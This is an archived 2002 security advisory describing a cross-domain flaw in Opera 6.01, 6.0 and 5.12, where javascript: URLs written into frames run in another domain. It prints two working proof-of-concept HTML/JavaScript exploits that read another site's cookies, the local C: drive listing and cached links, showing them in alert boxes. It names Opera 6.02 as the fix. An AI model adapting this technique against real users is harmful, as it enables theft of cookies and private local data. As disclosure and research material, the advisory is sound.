TUCoPS :: Browsers :: win5346.htm

Opera web browser javascript protocol permit to read cookies/filesystem/cache
16th May 2002 [SBWID-5346]
COMMAND

	Opera    we    browser    javascript    protocol    permit    to    read
	cookies/filesystem/cache

SYSTEMS AFFECTED

	At least Opera 6.01, 6.0, 5.12

PROBLEM

	In Andreas Sandblad [sandblad@acc.umu.se] advisory [#6] :
	

	                                                   _     _

	                                                 o\' \\,=./ `o

	                                                    (o o)

	---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

	

	Opera allows the location of  a  frame  to  be  overwritten  by  an  url
	containing  the  javascript  protocoll.  The  javascript  code  will  be
	operating in the same domain as the url that was  overwritten.  Thus  we
	can read cookies from other domains, local file  structure  and  private
	information from the cache (history of links visited).
	

	

	 EXPLOIT I:

	 ==========

	

	The following exploit has been tested to work on Opera 6.01, 6.0  (win).
	It will not work on 5.x because it requires the iframe feature.
	

	------------------- CUT HERE -----------------------------------

	<iframe name=cookie src=\"http://www.google.com/\" height=0

	width=0></iframe>

	<iframe name=files src=\"file://c:/\" height=0 width=0></iframe>

	<iframe name=cache src=\"opera:cache\" height=0 width=0></iframe><br>

	<a href=\"javascript:readCookie()\">Read google cookie</a><br>

	<a href=\"javascript:readFiles()\">Read c:/ structure (win)</a><br>

	<a href=\"javascript:readCache()\">Read links in cache</a><br>

	<script>

	function readCookie(){

	  cookie.location=\"javascript:alert(document.cookie)\";

	}

	function readFiles(){

	  t = \'javascript:s=\"\";l=document.links;\';

	  t+= \'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);\';

	  files.location = t;

	}

	function readCache(){

	  t = \'javascript:s=\"\";l=document.links;\';

	  t+= \'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);\';

	  cache.location = t;

	}

	</script>

	------------------- CUT HERE -----------------------------------

	

	

	 EXPLOIT II:

	 ===========

	

	For versions of Opera not supporting the iframe tag the exploit must  be
	done using the frame tag instead. The following exploit has been  tested
	on Opera 6.01, 6.0, 5.12 (win).
	

	------------------- CUT HERE -----------------------------------

	<HTML>

	<FRAMESET ROWS=\"100%,0,0,0\">

	<FRAME SRC=\"payload.html\">

	<FRAME NAME=\"cache\" src=\"opera:cache\" noresize>

	<FRAME NAME=\"files\" src=\"file:///c:/\" noresize>

	<FRAME NAME=\"cookie\" src=\"http://www.google.com/\" noresize>

	</FRAMESET>

	</HTML>

	------------------- CUT HERE -----------------------------------

	

	payload.html:
	

	------------------- CUT HERE -----------------------------------

	<a href=\"javascript:alert(document.cookie)\" target=\"cookie\">Google

	cookie</a><br>

	<a href=\"javascript:alert(document.links.item(0))\" target=\"cache\">First

	item in cache</a><br>

	<a href=\"javascript:alert(document.links.item(1))\" target=\"files\">First

	file/directory in c:\\ (win)</a>

	------------------- CUT HERE -----------------------------------

	

SOLUTION

	Get Opera 6.02 :
	

	http://www.opera.com/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH